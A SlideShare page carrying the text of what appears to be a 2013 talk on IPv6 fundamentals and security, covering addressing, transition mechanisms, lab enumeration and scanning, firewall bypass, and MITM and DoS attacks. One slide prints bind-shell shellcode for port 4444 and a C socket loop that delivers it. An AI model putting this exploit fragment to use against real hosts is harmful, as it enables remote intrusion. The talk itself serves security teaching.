SlideShare a Scribd company logo

IPv6 Fundamentals & Securities

Don Anto, profile picture
Don Anto

- IPv6 is needed to address the impending exhaustion of IPv4 address space. It features a 128-bit address compared to 32-bit in IPv4, vastly expanding the available addresses. - Security issues in transitioning from IPv4 to IPv6 include weaknesses in enumeration, scanning and managing the large IPv6 address space. Firewalls and other perimeter defenses must also protect both IPv4 and IPv6 networks to prevent bypass. - Attacks can exploit protocols like neighbor discovery in IPv6, as well as vulnerabilities in applications that operate over both IPv4 and IPv6. Proper implementation and maintenance of defenses is needed to secure the transition.

1 of 20
Downloaded 30 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
IPv6 Fundamentals & Securities Don Anto IPSECS.COM
Who? • Don Anto • Information security manager • JNCIP-SEC, GSEC, GCIH, GCIA, GPEN, TOGAF • A dead security researcher • Involve in security field for almost 10 years • Genius evil thinker; professional troublemaker • @djantoxz
IPv6 - Why? • Analog to digital convergence (E.G: Voice over IP) • The use of virtualization (E.G: Cloud) • Embedded devices (Smart phone, RFID) networking • All increase the needs of unique IP Address • So, more IP Address spaces are required! • Finally, IPv4 Address Exhaustion
IPv6 - What? • The latest version of Internet Protocol (IP), and is intended to replace IPv4 • 128 bit IP Addressing, instead of 32 bit, to multiply IP address space • IPv4 = 232 (4.294.967.296) >< IPv6 2128 (3.4×1038) • Not using dot decimal anymore, otherwise hexadecimal with colon is used • E.G: • 2001:2c0:cc00:6a01:2d0:b7ff:fe75:d092 • 2001:470:0:64::2 • fe80::1
IPv6 Fundamentals Source: Fernando Gont Presentation • IPv6 header, 40 Bytes Fixed Length • Source address 16 bytes, destination address 16 bytes • 8 bytes for version, traffic class, flow label, payload length, next header, & hop limit
IPv6 Fundamentals • IPv6 Address Type: • Loopback • Unspecified • Multicast • Anycast • Local unicast • Global unicast • Subneting • Routing Source: Fernando Gont Presentation
v4 >< v6 Source: Fernando Gont Presentation
v4 to v6 • Dual-Stack system to support IPv4 & IPv6 concurrently • Tunneling mechanism to encapsulate IPv6 inside IPv4 • 6to4, 6in4, Teredo, ISATAP • Network Address Translation (NAT) • Network Address Translation – Protocol Translation (NAT-PT) • Network Address Translation – IPv6 IPv4 (NAT-64) • Free IPv6 Tunnel Broker?
Security Issues • Large space of IPv6 address (enumeration, scanning, managing) • The use of tunneling? The use of dual-stack networking? • Weakness in IPv6 itself? (protocol level vulnerabilities) • Weakness of Application ran on IPv6
Enumeration • Discovery through multicast address (FF02::1) ipv6lab ->./alive6 eth4 • Discovery through ICMPv6 Echo Request Alive: dead:beaf::3 • Discovery through DNS Query (A >< AAAA) Alive: dead:beaf::1 • Discovery through SNMP Query Found 2 systems alive • Google helps us to find IPv6 domains • The presence of IPAM may be help ipv6lab->host -t A www.jp.freebsd.org www.jp.freebsd.org has address 119.245.129.228 ipv6lab->host -t AAAA www.jp.freebsd.org www.jp.freebsd.org has IPv6 address 2001:2c0:cc00:6a01:2d0:b7ff:fe75:d092 ipv6lab->ping6 -I eth4 ff02::1 PING ff02::1(ff02::1) from fe80::a00:27ff:fe39:6f0a eth4: 56 data bytes 64 bytes from fe80::a00:27ff:fe39:6f0a: icmp_seq=1 ttl=64 time=0.034 ms 64 bytes from fe80::a00:27ff:fe96:da90: icmp_seq=1 ttl=64 time=1.70 ms (DUP!) 64 bytes from fe80::a00:27ff:fe6c:ea37: icmp_seq=1 ttl=64 time=2.58 ms (DUP!) ipv6lab->ip -6 neigh show fe80::a00:27ff:fe96:da90 dev eth4 lladdr 08:00:27:96:da:90 REACHABLE fe80::a00:27ff:fe6c:ea37 dev eth4 lladdr 08:00:27:6c:ea:37 REACHABLE
ipv6lab->nmap -6 -sV -PN -T4 dead:beaf::3 Starting Nmap 5.00 ( http://nmap.org ) at 2013-01-15 15:50 WIT Interesting ports on dead:beaf::3: Not shown: 999 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9 (protocol 2.0) Scanning ipv6lab->nmap -sV -PN -T4 192.168.137.103 Starting Nmap 5.00 ( http://nmap.org ) at 2013-01-15 15:50 WIT Interesting ports on 192.168.137.103: Not shown: 998 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp? 22/tcp open ssh OpenSSH 5.9 (protocol 2.0) MAC Address: 08:00:27:6C:EA:37 (Cadmus Computer Systems) v4 to v6 proxy is usually helpful E.G: Socat apt-get install socat • Port Scanning (Tools with IPv6 support) • Vulnerability Scanning (Tools with IPv6 support)
Perimeter Defense Bypass • Does Firewall protect both IPv4 and IPv6 network? • Does IDS/IPS protect both IPv4 and IPv6 network? • TEREDO tunneling can be used to bypass NAT and to compromise internal network • The use of dual stack and tunneling mandates the protection for IPv4 and IPv6
Perimeter Defense Bypass • IPv4 is well governed by firewall using NAT or policies • Poor firewall configuration is potentially used to bypass access using IPv6 network to DMZ • Even worse, someone may directly access the internal network from internet
Exploiting - Protocols • IPv6 also designed to increase security of IPv4, unfortunately there is no significant improvement • Some problems in IPv4 is still persistent in IPv6 • Man In The Middle Attack • Denial of Services Attack • More and more 
Man In The Middle • Spoofed ICMP Neighbor Advertisement (replacing ARP in v4) • Spoofed ICMP Router Advertisement • Spoofed ICMP Redirect or ICMP Toobig to implant routing • Rogue DHCPv6 Server (replacing DHCP server in v4) • More and more  Source Image: OWASP website Used to help packet sniffing
Denial of Services anto# ifstat -b eth0 • Traffic flooding with ICMPv6 RA, NA, NS, MLD, Smurfing Kbps in Kbps out 9851.48 1.08 • Prevent new IPv6 address with DAD 10244.34 0.95 • CPU Exhaustion with ICMPv6 NS and a lot of crypto stuff 10313.33 0.95 • Routing loop attack utilizes automatic tunneling 9165.56 0.95 • ICMP attack against TCP to tear down BGP session 9358.11 0.95 10165.01 0.95 9802.98 0.95 9353.34 0.95 anto# tcpdump -n -i eth0 dst host dead:beaf::3 20:39:48.442267 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24 20:39:48.442290 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24 20:39:48.442314 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24 20:39:48.442337 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24 20:39:48.442585 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24 4700 packets captured 4884 packets received by filter 93 packets dropped by kernel
Exploiting - Apps char shellcode[] = /*Portbind @ 4444*/ "xd9xccxbdx59x34x55x97xd9x74x24xf4x5ax29xc9" • Buffer Overflow "xb1x17x31x6ax19x83xc2x04x03x6ax15xbbxc1x64" "x4cx68x69xd4x18x84xe4x3bxb6xfexaex76xc7x68" • Remote Format String "xd7xdbx9axc6xbax89x48x80x52x3fx31x2axcbx35" • Off-By-One "xc9x3bxeax20xd5x6axbbx3dx04xcfx29x58x9fx02" • Web App Attacks "x2dx14x79x2fx2ax98x06x1dx61x74x8ex40xc6xc8" • More Attacks?! "xf6x4fx49xbbxaex25x75xe4x9dx39xc0x6dxe6x51" "xfcxa2x65xc9x6ax92xebx60x05x65x08x22x8axfc" • There’s no big difference "x2ex72x27x32x30"; • Socket programming & shellcodes for(AI=AddrInfo;AI!=NULL;AI=AI->ai_next){ if((s=socket(AI->ai_family,AI->ai_socktype,AI->ai_protocol))<0){ v4 to v6 proxy is usually printf("can't create socketn"); exit(0); helpful E.G: Socat } apt-get install socat connect(s,AI->ai_addr,AI->ai_addrlen); send(s,buffer,len,0); printf("Check your shell on %s TCP port 4444n",argv[1]); }
DEMO
Discussion
Thank You

More Related Content

PDF
The Linux Block Layer - Built for Fast Storage
Kernel TLV
 
KEY
イマドキなNetwork/IO
Takuya ASADA
 
PDF
100 M pps on PC.
Redge Technologies
 
PDF
Feature rich BTRFS is Getting Richer with Encryption
LF Events
 
PDF
DPDK Summit 2015 - RIFT.io - Tim Mortsolf
Jim St. Leger
 
PDF
File Systems: Why, How and Where
Kernel TLV
 
PPTX
Trend - HPC-29mai2012
Agora Group
 
PPTX
QEMU and Raspberry Pi. Instant Embedded Development
GlobalLogic Ukraine
 
The Linux Block Layer - Built for Fast Storage
Kernel TLV
 
イマドキなNetwork/IO
Takuya ASADA
 
100 M pps on PC.
Redge Technologies
 
Feature rich BTRFS is Getting Richer with Encryption
LF Events
 
DPDK Summit 2015 - RIFT.io - Tim Mortsolf
Jim St. Leger
 
File Systems: Why, How and Where
Kernel TLV
 
Trend - HPC-29mai2012
Agora Group
 
QEMU and Raspberry Pi. Instant Embedded Development
GlobalLogic Ukraine
 

What's hot (20)

PPTX
Spy hard, challenges of 100G deep packet inspection on x86 platform
Redge Technologies
 
PPTX
Vigor 3910 docker firmware quick start
Jimmy Tu
 
PDF
Intel DPDK Step by Step instructions
Hisaki Ohara
 
PPTX
Ceph Day Bring Ceph To Enterprise
Alex Lau
 
PDF
Linux Kernel Live Patching
GlobalLogic Ukraine
 
PPTX
Bypassing ASLR Exploiting CVE 2015-7545
Kernel TLV
 
PDF
FreeBSD and Drivers
Kernel TLV
 
PDF
OpenWrt From Top to Bottom
Kernel TLV
 
PPTX
Reflections on Trusting Trust
yeokm1
 
PDF
Linux Kernel Platform Development: Challenges and Insights
GlobalLogic Ukraine
 
PDF
The 7 Deadly Sins of Packet Processing - Venky Venkatesan and Bruce Richardson
harryvanhaaren
 
PDF
DPDK Summit 2015 - NTT - Yoshihiro Nakajima
Jim St. Leger
 
PDF
Lagopus presentation on 14th Annual ON*VECTOR International Photonics Workshop
Lagopus SDN/OpenFlow switch
 
PDF
Kernel Recipes 2017 - Build farm again - Willy Tarreau
Anne Nicolas
 
PDF
DPDK In Depth
Kernel TLV
 
PDF
LAS16-100K1: Welcome Keynote
Linaro
 
PPTX
Lec 10-linux-review
abinaya m
 
PDF
DPDK & Layer 4 Packet Processing
Michelle Holley
 
PDF
QEMU Disk IO Which performs Better: Native or threads?
Pradeep Kumar
 
ODP
RAID, Replication, and You
Great Wide Open
 
Spy hard, challenges of 100G deep packet inspection on x86 platform
Redge Technologies
 
Vigor 3910 docker firmware quick start
Jimmy Tu
 
Intel DPDK Step by Step instructions
Hisaki Ohara
 
Ceph Day Bring Ceph To Enterprise
Alex Lau
 
Linux Kernel Live Patching
GlobalLogic Ukraine
 
Bypassing ASLR Exploiting CVE 2015-7545
Kernel TLV
 
FreeBSD and Drivers
Kernel TLV
 
OpenWrt From Top to Bottom
Kernel TLV
 
Reflections on Trusting Trust
yeokm1
 
Linux Kernel Platform Development: Challenges and Insights
GlobalLogic Ukraine
 
The 7 Deadly Sins of Packet Processing - Venky Venkatesan and Bruce Richardson
harryvanhaaren
 
DPDK Summit 2015 - NTT - Yoshihiro Nakajima
Jim St. Leger
 
Lagopus presentation on 14th Annual ON*VECTOR International Photonics Workshop
Lagopus SDN/OpenFlow switch
 
Kernel Recipes 2017 - Build farm again - Willy Tarreau
Anne Nicolas
 
DPDK In Depth
Kernel TLV
 
LAS16-100K1: Welcome Keynote
Linaro
 
Lec 10-linux-review
abinaya m
 
DPDK & Layer 4 Packet Processing
Michelle Holley
 
QEMU Disk IO Which performs Better: Native or threads?
Pradeep Kumar
 
RAID, Replication, and You
Great Wide Open
 
Ad

Viewers also liked (20)

PDF
Fred explainsi pv6-v2-alpha
Fred Bovy
 
PDF
Mobile IPv6 course at CACIC 2006
Rodolfo Kohn
 
PDF
IPV6 addressing plan exercise-1
stupidbopols
 
PDF
IPv4 and IPv6 - addressing Internet infrastructure
RIPE NCC
 
PDF
Addressing plans
enes373
 
PDF
IPv6 Addressing Fundamentals
RIPE NCC
 
PDF
Preparing an IPv6 Addressing Planl
Dave Thyssen
 
PDF
IPv6 Addressing Plans and Subnetting
RIPE NCC
 
PDF
IPv6 Addressing Plan Fundamentals
RIPE NCC
 
PPT
I pv6 for cmu
Naranont Atima
 
PPTX
instructor ppt_chapter8.2.2 - i_pv6 addressing with exercises of IPv6
cyberjoex
 
PDF
IPv6 Address Planning
Deploy360 Programme (Internet Society)
 
PPTX
IPV6 Addressing
Heba_a
 
PPT
Internet Protocol Version 6
sandeepjain
 
PPT
IPv6 networking training sduffy v3
Shane Duffy
 
PPS
Lesson 3: IPv6 Fundamentals
Mahmmoud Mahdi
 
PDF
Networking - TCP/IP stack introduction and IPv6
Rodolfo Kohn
 
PDF
Addressing IPv6
Fastly
 
PPT
IPv6 theoryfinalx
Pawan Sharma
 
PDF
IPv6 Fundamentals
Matt Bynum
 
Fred explainsi pv6-v2-alpha
Fred Bovy
 
Mobile IPv6 course at CACIC 2006
Rodolfo Kohn
 
IPV6 addressing plan exercise-1
stupidbopols
 
IPv4 and IPv6 - addressing Internet infrastructure
RIPE NCC
 
Addressing plans
enes373
 
IPv6 Addressing Fundamentals
RIPE NCC
 
Preparing an IPv6 Addressing Planl
Dave Thyssen
 
IPv6 Addressing Plans and Subnetting
RIPE NCC
 
IPv6 Addressing Plan Fundamentals
RIPE NCC
 
I pv6 for cmu
Naranont Atima
 
instructor ppt_chapter8.2.2 - i_pv6 addressing with exercises of IPv6
cyberjoex
 
IPv6 Address Planning
Deploy360 Programme (Internet Society)
 
IPV6 Addressing
Heba_a
 
Internet Protocol Version 6
sandeepjain
 
IPv6 networking training sduffy v3
Shane Duffy
 
Lesson 3: IPv6 Fundamentals
Mahmmoud Mahdi
 
Networking - TCP/IP stack introduction and IPv6
Rodolfo Kohn
 
Addressing IPv6
Fastly
 
IPv6 theoryfinalx
Pawan Sharma
 
IPv6 Fundamentals
Matt Bynum
 
Ad

Similar to IPv6 Fundamentals & Securities (20)

PDF
IPv6 Theory by Cisco
Febrian ‎
 
KEY
ipv6 introduction & environment buildup
psychesnet Hsieh
 
PDF
Ipv6 cheat sheet
balamurugan N
 
PPTX
Upcoming internet challenges
Ivan Pepelnjak
 
PDF
Improved Applications with IPv6: an overview
Cisco DevNet
 
PDF
IPv6 Security - Workshop mit Live Demo
Digicomp Academy AG
 
PDF
4. IPv6 Security - Workshop mit Live Demo - Marco Senn Fortinet
Digicomp Academy AG
 
PDF
How You Will Get Hacked Ten Years from Now
julievreeland
 
PDF
IPv6 Basics - pfSense Hangout July 2015
Netgate
 
PDF
ipv6_cheat_sheet.pdf
pradeeppotter
 
PPT
Day 20.i pv6 lab
CYBERINTELLIGENTS
 
PDF
IPv6 Implementation and Migration
Network Utility Force
 
PDF
Ipv6 1-091110143246-phpapp01
Rimba Ari
 
PDF
Ipv6 cheat sheet
Swarup Hait
 
PPT
ASCC Network Experience in IPv6
Ethern Lin
 
PDF
Hackerworkshop exercises
Henrik Kramshøj
 
PDF
Exploring I Pv6
Gratien D'haese
 
PDF
Ipv Technical White Paper Wp111504
Erik Ginalick
 
PDF
Ipv6 Technical White Paper Wp111504
Erik Ginalick
 
PDF
IPv6 In z/VSE:IBM z/VSE Live Virtual Class 2012
IBM India Smarter Computing
 
IPv6 Theory by Cisco
Febrian ‎
 
ipv6 introduction & environment buildup
psychesnet Hsieh
 
Ipv6 cheat sheet
balamurugan N
 
Upcoming internet challenges
Ivan Pepelnjak
 
Improved Applications with IPv6: an overview
Cisco DevNet
 
IPv6 Security - Workshop mit Live Demo
Digicomp Academy AG
 
4. IPv6 Security - Workshop mit Live Demo - Marco Senn Fortinet
Digicomp Academy AG
 
How You Will Get Hacked Ten Years from Now
julievreeland
 
IPv6 Basics - pfSense Hangout July 2015
Netgate
 
ipv6_cheat_sheet.pdf
pradeeppotter
 
Day 20.i pv6 lab
CYBERINTELLIGENTS
 
IPv6 Implementation and Migration
Network Utility Force
 
Ipv6 1-091110143246-phpapp01
Rimba Ari
 
Ipv6 cheat sheet
Swarup Hait
 
ASCC Network Experience in IPv6
Ethern Lin
 
Hackerworkshop exercises
Henrik Kramshøj
 
Exploring I Pv6
Gratien D'haese
 
Ipv Technical White Paper Wp111504
Erik Ginalick
 
Ipv6 Technical White Paper Wp111504
Erik Ginalick
 
IPv6 In z/VSE:IBM z/VSE Live Virtual Class 2012
IBM India Smarter Computing
 

More from Don Anto (7)

PDF
Red Team: Emulating Advanced Adversaries in Cyberspace
Don Anto
 
PPT
Network & Computer Forensic
Don Anto
 
PDF
BGP Vulnerability
Don Anto
 
PDF
Web & Wireless Hacking
Don Anto
 
PDF
Spying The Wire
Don Anto
 
PDF
Distributed Cracking
Don Anto
 
PDF
Deep Knowledge on Network Hacking Philosopy
Don Anto
 
Red Team: Emulating Advanced Adversaries in Cyberspace
Don Anto
 
Network & Computer Forensic
Don Anto
 
BGP Vulnerability
Don Anto
 
Web & Wireless Hacking
Don Anto
 
Spying The Wire
Don Anto
 
Distributed Cracking
Don Anto
 
Deep Knowledge on Network Hacking Philosopy
Don Anto
 

IPv6 Fundamentals & Securities

  • 1. IPv6 Fundamentals & Securities Don Anto IPSECS.COM
  • 2. Who? • Don Anto • Information security manager • JNCIP-SEC, GSEC, GCIH, GCIA, GPEN, TOGAF • A dead security researcher • Involve in security field for almost 10 years • Genius evil thinker; professional troublemaker • @djantoxz
  • 3. IPv6 - Why? • Analog to digital convergence (E.G: Voice over IP) • The use of virtualization (E.G: Cloud) • Embedded devices (Smart phone, RFID) networking • All increase the needs of unique IP Address • So, more IP Address spaces are required! • Finally, IPv4 Address Exhaustion
  • 4. IPv6 - What? • The latest version of Internet Protocol (IP), and is intended to replace IPv4 • 128 bit IP Addressing, instead of 32 bit, to multiply IP address space • IPv4 = 232 (4.294.967.296) >< IPv6 2128 (3.4×1038) • Not using dot decimal anymore, otherwise hexadecimal with colon is used • E.G: • 2001:2c0:cc00:6a01:2d0:b7ff:fe75:d092 • 2001:470:0:64::2 • fe80::1
  • 5. IPv6 Fundamentals Source: Fernando Gont Presentation • IPv6 header, 40 Bytes Fixed Length • Source address 16 bytes, destination address 16 bytes • 8 bytes for version, traffic class, flow label, payload length, next header, & hop limit
  • 6. IPv6 Fundamentals • IPv6 Address Type: • Loopback • Unspecified • Multicast • Anycast • Local unicast • Global unicast • Subneting • Routing Source: Fernando Gont Presentation
  • 7. v4 >< v6 Source: Fernando Gont Presentation
  • 8. v4 to v6 • Dual-Stack system to support IPv4 & IPv6 concurrently • Tunneling mechanism to encapsulate IPv6 inside IPv4 • 6to4, 6in4, Teredo, ISATAP • Network Address Translation (NAT) • Network Address Translation – Protocol Translation (NAT-PT) • Network Address Translation – IPv6 IPv4 (NAT-64) • Free IPv6 Tunnel Broker?
  • 9. Security Issues • Large space of IPv6 address (enumeration, scanning, managing) • The use of tunneling? The use of dual-stack networking? • Weakness in IPv6 itself? (protocol level vulnerabilities) • Weakness of Application ran on IPv6
  • 10. Enumeration • Discovery through multicast address (FF02::1) ipv6lab ->./alive6 eth4 • Discovery through ICMPv6 Echo Request Alive: dead:beaf::3 • Discovery through DNS Query (A >< AAAA) Alive: dead:beaf::1 • Discovery through SNMP Query Found 2 systems alive • Google helps us to find IPv6 domains • The presence of IPAM may be help ipv6lab->host -t A www.jp.freebsd.org www.jp.freebsd.org has address 119.245.129.228 ipv6lab->host -t AAAA www.jp.freebsd.org www.jp.freebsd.org has IPv6 address 2001:2c0:cc00:6a01:2d0:b7ff:fe75:d092 ipv6lab->ping6 -I eth4 ff02::1 PING ff02::1(ff02::1) from fe80::a00:27ff:fe39:6f0a eth4: 56 data bytes 64 bytes from fe80::a00:27ff:fe39:6f0a: icmp_seq=1 ttl=64 time=0.034 ms 64 bytes from fe80::a00:27ff:fe96:da90: icmp_seq=1 ttl=64 time=1.70 ms (DUP!) 64 bytes from fe80::a00:27ff:fe6c:ea37: icmp_seq=1 ttl=64 time=2.58 ms (DUP!) ipv6lab->ip -6 neigh show fe80::a00:27ff:fe96:da90 dev eth4 lladdr 08:00:27:96:da:90 REACHABLE fe80::a00:27ff:fe6c:ea37 dev eth4 lladdr 08:00:27:6c:ea:37 REACHABLE
  • 11. ipv6lab->nmap -6 -sV -PN -T4 dead:beaf::3 Starting Nmap 5.00 ( http://nmap.org ) at 2013-01-15 15:50 WIT Interesting ports on dead:beaf::3: Not shown: 999 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9 (protocol 2.0) Scanning ipv6lab->nmap -sV -PN -T4 192.168.137.103 Starting Nmap 5.00 ( http://nmap.org ) at 2013-01-15 15:50 WIT Interesting ports on 192.168.137.103: Not shown: 998 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp? 22/tcp open ssh OpenSSH 5.9 (protocol 2.0) MAC Address: 08:00:27:6C:EA:37 (Cadmus Computer Systems) v4 to v6 proxy is usually helpful E.G: Socat apt-get install socat • Port Scanning (Tools with IPv6 support) • Vulnerability Scanning (Tools with IPv6 support)
  • 12. Perimeter Defense Bypass • Does Firewall protect both IPv4 and IPv6 network? • Does IDS/IPS protect both IPv4 and IPv6 network? • TEREDO tunneling can be used to bypass NAT and to compromise internal network • The use of dual stack and tunneling mandates the protection for IPv4 and IPv6
  • 13. Perimeter Defense Bypass • IPv4 is well governed by firewall using NAT or policies • Poor firewall configuration is potentially used to bypass access using IPv6 network to DMZ • Even worse, someone may directly access the internal network from internet
  • 14. Exploiting - Protocols • IPv6 also designed to increase security of IPv4, unfortunately there is no significant improvement • Some problems in IPv4 is still persistent in IPv6 • Man In The Middle Attack • Denial of Services Attack • More and more 
  • 15. Man In The Middle • Spoofed ICMP Neighbor Advertisement (replacing ARP in v4) • Spoofed ICMP Router Advertisement • Spoofed ICMP Redirect or ICMP Toobig to implant routing • Rogue DHCPv6 Server (replacing DHCP server in v4) • More and more  Source Image: OWASP website Used to help packet sniffing
  • 16. Denial of Services anto# ifstat -b eth0 • Traffic flooding with ICMPv6 RA, NA, NS, MLD, Smurfing Kbps in Kbps out 9851.48 1.08 • Prevent new IPv6 address with DAD 10244.34 0.95 • CPU Exhaustion with ICMPv6 NS and a lot of crypto stuff 10313.33 0.95 • Routing loop attack utilizes automatic tunneling 9165.56 0.95 • ICMP attack against TCP to tear down BGP session 9358.11 0.95 10165.01 0.95 9802.98 0.95 9353.34 0.95 anto# tcpdump -n -i eth0 dst host dead:beaf::3 20:39:48.442267 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24 20:39:48.442290 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24 20:39:48.442314 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24 20:39:48.442337 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24 20:39:48.442585 IP6 ff02::1 > dead:beaf::3: ICMP6, echo request, seq 48879, length 24 4700 packets captured 4884 packets received by filter 93 packets dropped by kernel
  • 17. Exploiting - Apps char shellcode[] = /*Portbind @ 4444*/ "xd9xccxbdx59x34x55x97xd9x74x24xf4x5ax29xc9" • Buffer Overflow "xb1x17x31x6ax19x83xc2x04x03x6ax15xbbxc1x64" "x4cx68x69xd4x18x84xe4x3bxb6xfexaex76xc7x68" • Remote Format String "xd7xdbx9axc6xbax89x48x80x52x3fx31x2axcbx35" • Off-By-One "xc9x3bxeax20xd5x6axbbx3dx04xcfx29x58x9fx02" • Web App Attacks "x2dx14x79x2fx2ax98x06x1dx61x74x8ex40xc6xc8" • More Attacks?! "xf6x4fx49xbbxaex25x75xe4x9dx39xc0x6dxe6x51" "xfcxa2x65xc9x6ax92xebx60x05x65x08x22x8axfc" • There’s no big difference "x2ex72x27x32x30"; • Socket programming & shellcodes for(AI=AddrInfo;AI!=NULL;AI=AI->ai_next){ if((s=socket(AI->ai_family,AI->ai_socktype,AI->ai_protocol))<0){ v4 to v6 proxy is usually printf("can't create socketn"); exit(0); helpful E.G: Socat } apt-get install socat connect(s,AI->ai_addr,AI->ai_addrlen); send(s,buffer,len,0); printf("Check your shell on %s TCP port 4444n",argv[1]); }
  • 18. DEMO